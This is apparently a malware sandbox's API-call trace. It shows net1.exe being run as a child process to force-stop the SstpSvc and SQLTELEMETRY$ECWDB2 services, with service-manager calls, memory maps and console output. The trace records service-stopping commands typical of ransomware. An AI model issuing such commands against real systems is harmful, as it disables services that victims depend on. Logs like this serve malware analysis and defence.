_setmode (_FileHandle=0, _Mode=16384) returned 16384 [0115.315] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0115.315] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0115.315] _wcsicmp (_String1="config", _String2="stop") returned -16 [0115.316] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0115.316] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0115.316] _wcsicmp (_String1="file", _String2="stop") returned -13 [0115.316] _wcsicmp (_String1="files", _String2="stop") returned -13 [0115.316] _wcsicmp (_String1="group", _String2="stop") returned -12 [0115.316] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0115.316] _wcsicmp (_String1="help", _String2="stop") returned -11 [0115.316] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0115.316] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0115.316] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0115.316] _wcsicmp (_String1="session", _String2="stop") returned -15 [0115.316] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0115.316] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0115.316] _wcsicmp (_String1="share", _String2="stop") returned -12 [0115.316] _wcsicmp (_String1="start", _String2="stop") returned -14 [0115.316] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0115.316] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0115.316] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0115.316] _wcsicmp (_String1="accounts", _String2="SstpSvc") returned -18 [0115.316] _wcsicmp (_String1="computer", _String2="SstpSvc") returned -16 [0115.316] _wcsicmp (_String1="config", _String2="SstpSvc") returned -16 [0115.316] _wcsicmp (_String1="continue", _String2="SstpSvc") returned -16 [0115.316] _wcsicmp (_String1="cont", _String2="SstpSvc") returned -16 [0115.316] _wcsicmp (_String1="file", _String2="SstpSvc") returned -13 [0115.316] _wcsicmp (_String1="files", _String2="SstpSvc") returned -13 [0115.316] _wcsicmp (_String1="group", _String2="SstpSvc") returned -12 [0115.316] _wcsicmp (_String1="groups", _String2="SstpSvc") returned -12 [0115.316] _wcsicmp (_String1="help", _String2="SstpSvc") returned -11 [0115.316] _wcsicmp (_String1="helpmsg", _String2="SstpSvc") returned -11 [0115.316] _wcsicmp (_String1="localgroup", _String2="SstpSvc") returned -7 [0115.316] _wcsicmp (_String1="pause", _String2="SstpSvc") returned -3 [0115.316] _wcsicmp (_String1="session", _String2="SstpSvc") returned -14 [0115.316] _wcsicmp (_String1="sessions", _String2="SstpSvc") returned -14 [0115.317] _wcsicmp (_String1="sess", _String2="SstpSvc") returned -14 [0115.317] _wcsicmp (_String1="share", _String2="SstpSvc") returned -11 [0115.317] _wcsicmp (_String1="start", _String2="SstpSvc") returned 1 [0115.317] _wcsicmp (_String1="stats", _String2="SstpSvc") returned 1 [0115.317] _wcsicmp (_String1="statistics", _String2="SstpSvc") returned 1 [0115.317] _wcsicmp (_String1="stop", _String2="SstpSvc") returned 1 [0115.317] _wcsicmp (_String1="time", _String2="SstpSvc") returned 1 [0115.317] _wcsicmp (_String1="user", _String2="SstpSvc") returned 2 [0115.317] _wcsicmp (_String1="users", _String2="SstpSvc") returned 2 [0115.317] _wcsicmp (_String1="msg", _String2="SstpSvc") returned -6 [0115.317] _wcsicmp (_String1="messenger", _String2="SstpSvc") returned -6 [0115.317] _wcsicmp (_String1="receiver", _String2="SstpSvc") returned -1 [0115.317] _wcsicmp (_String1="rcv", _String2="SstpSvc") returned -1 [0115.317] _wcsicmp (_String1="netpopup", _String2="SstpSvc") returned -5 [0115.317] _wcsicmp (_String1="redirector", _String2="SstpSvc") returned -1 [0115.317] _wcsicmp (_String1="redir", _String2="SstpSvc") returned -1 [0115.317] _wcsicmp (_String1="rdr", _String2="SstpSvc") returned -1 [0115.317] _wcsicmp (_String1="workstation", _String2="SstpSvc") returned 4 [0115.317] _wcsicmp (_String1="work", _String2="SstpSvc") returned 4 [0115.317] _wcsicmp (_String1="wksta", _String2="SstpSvc") returned 4 [0115.317] _wcsicmp (_String1="prdr", _String2="SstpSvc") returned -3 [0115.317] _wcsicmp (_String1="devrdr", _String2="SstpSvc") returned -15 [0115.317] _wcsicmp (_String1="lanmanworkstation", _String2="SstpSvc") returned -7 [0115.317] _wcsicmp (_String1="server", _String2="SstpSvc") returned -14 [0115.317] _wcsicmp (_String1="svr", _String2="SstpSvc") returned 3 [0115.317] _wcsicmp (_String1="srv", _String2="SstpSvc") returned -1 [0115.317] _wcsicmp (_String1="lanmanserver", _String2="SstpSvc") returned -7 [0115.317] _wcsicmp (_String1="alerter", _String2="SstpSvc") returned -18 [0115.317] _wcsicmp (_String1="netlogon", _String2="SstpSvc") returned -5 [0115.317] _wcsupr (in: _String="SstpSvc" | out: _String="SSTPSVC") returned="SSTPSVC" [0115.318] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x26cdf0 [0115.322] GetServiceKeyNameW (in: hSCManager=0x26cdf0, lpDisplayName="SSTPSVC", lpServiceName=0xff065750, lpcchBuffer=0x1efde8 | out: lpServiceName="", lpcchBuffer=0x1efde8) returned 0 [0115.323] _wcsicmp (_String1="msg", _String2="SSTPSVC") returned -6 [0115.323] _wcsicmp (_String1="messenger", _String2="SSTPSVC") returned -6 [0115.323] _wcsicmp (_String1="receiver", _String2="SSTPSVC") returned -1 [0115.323] _wcsicmp (_String1="rcv", _String2="SSTPSVC") returned -1 [0115.323] _wcsicmp (_String1="redirector", _String2="SSTPSVC") returned -1 [0115.323] _wcsicmp (_String1="redir", _String2="SSTPSVC") returned -1 [0115.323] _wcsicmp (_String1="rdr", _String2="SSTPSVC") returned -1 [0115.323] _wcsicmp (_String1="workstation", _String2="SSTPSVC") returned 4 [0115.323] _wcsicmp (_String1="work", _String2="SSTPSVC") returned 4 [0115.323] _wcsicmp (_String1="wksta", _String2="SSTPSVC") returned 4 [0115.323] _wcsicmp (_String1="prdr", _String2="SSTPSVC") returned -3 [0115.323] _wcsicmp (_String1="devrdr", _String2="SSTPSVC") returned -15 [0115.323] _wcsicmp (_String1="lanmanworkstation", _String2="SSTPSVC") returned -7 [0115.323] _wcsicmp (_String1="server", _String2="SSTPSVC") returned -14 [0115.323] _wcsicmp (_String1="svr", _String2="SSTPSVC") returned 3 [0115.323] _wcsicmp (_String1="srv", _String2="SSTPSVC") returned -1 [0115.323] _wcsicmp (_String1="lanmanserver", _String2="SSTPSVC") returned -7 [0115.323] _wcsicmp (_String1="alerter", _String2="SSTPSVC") returned -18 [0115.323] _wcsicmp (_String1="netlogon", _String2="SSTPSVC") returned -5 [0115.323] NetServiceControl (in: servername=0x0, service="SSTPSVC", opcode=0x0, arg=0x0, bufptr=0x1efdf0 | out: bufptr=0x1efdf0) returned 0x0 [0115.325] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x1efda8 | out: Buffer=0x1efda8*=0x270c70) returned 0x0 [0115.325] OpenServiceW (hSCManager=0x26cdf0, lpServiceName="SSTPSVC", dwDesiredAccess=0xc) returned 0x26ce50 [0115.325] QueryServiceStatus (in: hService=0x26ce50, lpServiceStatus=0x1efd50 | out: lpServiceStatus=0x1efd50*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0115.325] GetServiceDisplayNameW (in: hSCManager=0x26cdf0, lpServiceName="SSTPSVC", lpDisplayName=0xff065350, lpcchBuffer=0x1efd28 | out: lpDisplayName="Secure Socket Tunneling Protocol Service", lpcchBuffer=0x1efd28) returned 1 [0115.326] NetApiBufferFree (Buffer=0x270c70) returned 0x0 [0115.326] CloseServiceHandle (hSCObject=0x26ce50) returned 1 [0115.326] wcscpy_s (in: _Destination=0xff0680d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0115.326] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0115.327] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0xff065b50, nSize=0x800, Arguments=0xff067f90 | out: lpBuffer="The Secure Socket Tunneling Protocol Service service is not started.\r\n") returned 0x46 [0115.329] GetFileType (hFile=0xb) returned 0x2 [0115.329] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1efc48 | out: lpMode=0x1efc48) returned 1 [0115.329] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff065b50*, nNumberOfCharsToWrite=0x46, lpNumberOfCharsWritten=0x1efc40, lpReserved=0x0 | out: lpBuffer=0xff065b50*, lpNumberOfCharsWritten=0x1efc40*=0x46) returned 1 [0115.330] GetFileType (hFile=0xb) returned 0x2 [0115.330] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1efc48 | out: lpMode=0x1efc48) returned 1 [0115.330] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff041efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1efc40, lpReserved=0x0 | out: lpBuffer=0xff041efc*, lpNumberOfCharsWritten=0x1efc40*=0x2) returned 1 [0115.330] _ultow (in: _Dest=0xdc1, _Radix=2030768 | out: _Dest=0xdc1) returned="3521" [0115.330] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff065b50, nSize=0x800, Arguments=0xff067f90 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0115.330] GetFileType (hFile=0xb) returned 0x2 [0115.331] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1efc48 | out: lpMode=0x1efc48) returned 1 [0115.331] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff065b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1efc40, lpReserved=0x0 | out: lpBuffer=0xff065b50*, lpNumberOfCharsWritten=0x1efc40*=0x34) returned 1 [0115.331] GetFileType (hFile=0xb) returned 0x2 [0115.331] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1efc48 | out: lpMode=0x1efc48) returned 1 [0115.332] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff041efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1efc40, lpReserved=0x0 | out: lpBuffer=0xff041efc*, lpNumberOfCharsWritten=0x1efc40*=0x2) returned 1 [0115.332] NetApiBufferFree (Buffer=0x264d40) returned 0x0 [0115.332] NetApiBufferFree (Buffer=0x26c0e0) returned 0x0 [0115.332] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SstpSvc /y" [0115.332] exit (_Code=2) Process: id = "314" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x4f89c000" os_pid = "0xa64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "304" os_parent_pid = "0x4e4" cmd_line = "C:\\Windows\\system32\\net1 stop SQLTELEMETRY$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11208 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11209 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11210 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11211 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 11212 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11213 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11214 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11215 start_va = 0xff040000 end_va = 0xff072fff entry_point = 0xff040000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11216 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11217 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11218 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 11219 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11285 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11286 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11287 start_va = 0x120000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 11288 start_va = 0x220000 end_va = 0x286fff entry_point = 0x220000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11289 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 11290 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 11291 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11292 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11293 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11294 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11295 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11296 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11297 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11298 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11299 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11300 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11301 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11302 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11303 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11304 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11305 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11306 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11307 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11308 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11309 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11310 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11311 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 829 os_tid = 0xa2c [0115.339] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefbf0 | out: lpSystemTimeAsFileTime=0xefbf0*(dwLowDateTime=0xf9e37530, dwHighDateTime=0x1d48689)) [0115.339] GetCurrentProcessId () returned 0xa64 [0115.339] GetCurrentThreadId () returned 0xa2c [0115.339] GetTickCount () returned 0x26843 [0115.339] QueryPerformanceCounter (in: lpPerformanceCount=0xefbf8 | out: lpPerformanceCount=0xefbf8*=1816225700000) returned 1 [0115.339] GetModuleHandleW (lpModuleName=0x0) returned 0xff040000 [0115.339] __set_app_type (_Type=0x1) [0115.339] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff059c9c) returned 0x0 [0115.339] __getmainargs (in: _Argc=0xff064780, _Argv=0xff064790, _Env=0xff064788, _DoWildCard=0, _StartInfo=0xff06479c | out: _Argc=0xff064780, _Argv=0xff064790, _Env=0xff064788) returned 0 [0115.340] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0115.340] GetConsoleOutputCP () returned 0x1b5 [0115.340] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff06cec0 | out: lpCPInfo=0xff06cec0) returned 1 [0115.340] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0115.342] sprintf_s (in: _DstBuf=0xefb98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0115.342] setlocale (category=0, locale=".437") returned="English_United States.437" [0115.344] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.344] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0115.344] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLTELEMETRY$ECWDB2 /y" [0115.344] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef930, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0115.344] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0115.344] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefb88 | out: Buffer=0xefb88*=0x134d60) returned 0x0 [0115.344] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefb88 | out: Buffer=0xefb88*=0x13c130) returned 0x0 [0115.344] _fileno (_File=0x7fefdba2a80) returned 0 [0115.344] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0115.344] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0115.345] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0115.345] _wcsicmp (_String1="config", _String2="stop") returned -16 [0115.345] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0115.345] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0115.345] _wcsicmp (_String1="file", _String2="stop") returned -13 [0115.345] _wcsicmp (_String1="files", _String2="stop") returned -13 [0115.345] _wcsicmp (_String1="group", _String2="stop") returned -12 [0115.345] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0115.345] _wcsicmp (_String1="help", _String2="stop") returned -11 [0115.345] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0115.345] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0115.345] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0115.345] _wcsicmp (_String1="session", _String2="stop") returned -15 [0115.345] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0115.345] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0115.345] _wcsicmp (_String1="share", _String2="stop") returned -12 [0115.345] _wcsicmp (_String1="start", _String2="stop") returned -14 [0115.345] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0115.345] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0115.345] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0115.345] _wcsicmp (_String1="accounts", _String2="SQLTELEMETRY$ECWDB2") returned -18 [0115.345] _wcsicmp (_String1="computer", _String2="SQLTELEMETRY$ECWDB2") returned -16 [0115.345] _wcsicmp (_String1="config", _String2="SQLTELEMETRY$ECWDB2") returned -16 [0115.345] _wcsicmp (_String1="continue", _String2="SQLTELEMETRY$ECWDB2") returned -16 [0115.345] _wcsicmp (_String1="cont", _String2="SQLTELEMETRY$ECWDB2") returned -16 [0115.345] _wcsicmp (_String1="file", _String2="SQLTELEMETRY$ECWDB2") returned -13 [0115.345] _wcsicmp (_String1="files", _String2="SQLTELEMETRY$ECWDB2") returned -13 [0115.345] _wcsicmp (_String1="group", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0115.345] _wcsicmp (_String1="groups", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0115.345] _wcsicmp (_String1="help", _String2="SQLTELEMETRY$ECWDB2") returned -11 [0115.345] _wcsicmp (_String1="helpmsg", _String2="SQLTELEMETRY$ECWDB2") returned -11 [0115.345] _wcsicmp (_String1="localgroup", _String2="SQLTELEMETRY$ECWDB2") returned -7 [0115.346] _wcsicmp (_String1="pause", _String2="SQLTELEMETRY$ECWDB2") returned -3 [0115.346] _wcsicmp (_String1="session", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0115.346] _wcsicmp (_String1="sessions", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0115.346] _wcsicmp (_String1="sess", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0115.346] _wcsicmp (_String1="share", _String2="SQLTELEMETRY$ECWDB2") returned -9 [0115.346] _wcsicmp (_String1="start", _String2="SQLTELEMETRY$ECWDB2") returned 3 [0115.346] _wcsicmp (_String1="stats", _String2="SQLTELEMETRY$ECWDB2") returned 3 [0115.346] _wcsicmp (_String1="statistics", _String2="SQLTELEMETRY$ECWDB2") returned 3 [0115.346] _wcsicmp (_String1="stop", _String2="SQLTELEMETRY$ECWDB2") returned 3 [0115.346] _wcsicmp (_String1="time", _String2="SQLTELEMETRY$ECWDB2") returned 1 [0115.346] _wcsicmp (_String1="user", _String2="SQLTELEMETRY$ECWDB2") returned 2 [0115.346] _wcsicmp (_String1="users", _String2="SQLTELEMETRY$ECWDB2") returned 2 [0115.346] _wcsicmp (_String1="msg", _String2="SQLTELEMETRY$ECWDB2") returned -6 [0115.346] _wcsicmp (_String1="messenger", _String2="SQLTELEMETRY$ECWDB2") returned -6 [0115.346] _wcsicmp (_String1="receiver", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0115.346] _wcsicmp (_String1="rcv", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0115.346] _wcsicmp (_String1="netpopup", _String2="SQLTELEMETRY$ECWDB2") returned -5 [0115.346] _wcsicmp (_String1="redirector", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0115.346] _wcsicmp (_String1="redir", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0115.346] _wcsicmp (_String1="rdr", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0115.346] _wcsicmp (_String1="workstation", _String2="SQLTELEMETRY$ECWDB2") returned 4 [0115.346] _wcsicmp (_String1="work", _String2="SQLTELEMETRY$ECWDB2") returned 4 [0115.346] _wcsicmp (_String1="wksta", _String2="SQLTELEMETRY$ECWDB2") returned 4 [0115.346] _wcsicmp (_String1="prdr", _String2="SQLTELEMETRY$ECWDB2") returned -3 [0115.346] _wcsicmp (_String1="devrdr", _String2="SQLTELEMETRY$ECWDB2") returned -15 [0115.346] _wcsicmp (_String1="lanmanworkstation", _String2="SQLTELEMETRY$ECWDB2") returned -7 [0115.346] _wcsicmp (_String1="server", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0115.346] _wcsicmp (_String1="svr", _String2="SQLTELEMETRY$ECWDB2") returned 5 [0115.346] _wcsicmp (_String1="srv", _String2="SQLTELEMETRY$ECWDB2") returned 1 [0115.346] _wcsicmp (_String1="lanmanserver", _String2="SQLTELEMETRY$ECWDB2") returned -7 [0115.346] _wcsicmp (_String1="alerter", _String2="SQLTELEMETRY$ECWDB2") returned -18 [0115.346] _wcsicmp (_String1="netlogon", _String2="SQLTELEMETRY$ECWDB2") returned -5 [0115.347] _wcsupr (in: _String="SQLTELEMETRY$ECWDB2" | out: _String="SQLTELEMETRY$ECWDB2") returned="SQLTELEMETRY$ECWDB2" [0115.347] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x13ce40 [0115.351] GetServiceKeyNameW (in: hSCManager=0x13ce40, lpDisplayName="SQLTELEMETRY$ECWDB2", lpServiceName=0xff065750, lpcchBuffer=0xefaa8 | out: lpServiceName="", lpcchBuffer=0xefaa8) returned 0 [0115.352] _wcsicmp (_String1="msg", _String2="SQLTELEMETRY$ECWDB2") returned -6 [0115.352] _wcsicmp (_String1="messenger", _String2="SQLTELEMETRY$ECWDB2") returned -6 [0115.352] _wcsicmp (_String1="receiver", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0115.353] _wcsicmp (_String1="rcv", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0115.353] _wcsicmp (_String1="redirector", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0115.353] _wcsicmp (_String1="redir", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0115.353] _wcsicmp (_String1="rdr", _String2="SQLTELEMETRY$ECWDB2") returned -1 [0115.353] _wcsicmp (_String1="workstation", _String2="SQLTELEMETRY$ECWDB2") returned 4 [0115.353] _wcsicmp (_String1="work", _String2="SQLTELEMETRY$ECWDB2") returned 4 [0115.353] _wcsicmp (_String1="wksta", _String2="SQLTELEMETRY$ECWDB2") returned 4 [0115.353] _wcsicmp (_String1="prdr", _String2="SQLTELEMETRY$ECWDB2") returned -3 [0115.353] _wcsicmp (_String1="devrdr", _String2="SQLTELEMETRY$ECWDB2") returned -15 [0115.353] _wcsicmp (_String1="lanmanworkstation", _String2="SQLTELEMETRY$ECWDB2") returned -7 [0115.353] _wcsicmp (_String1="server", _String2="SQLTELEMETRY$ECWDB2") returned -12 [0115.353] _wcsicmp (_String1="svr", _String2="SQLTELEMETRY$ECWDB2") returned 5 [0115.353] _wcsicmp (_String1="srv", _String2="SQLTELEMETRY$ECWDB2") returned 1 [0115.353] _wcsicmp (_String1="lanmanserver", _String2="SQLTELEMETRY$ECWDB2") returned -7 [0115.353] 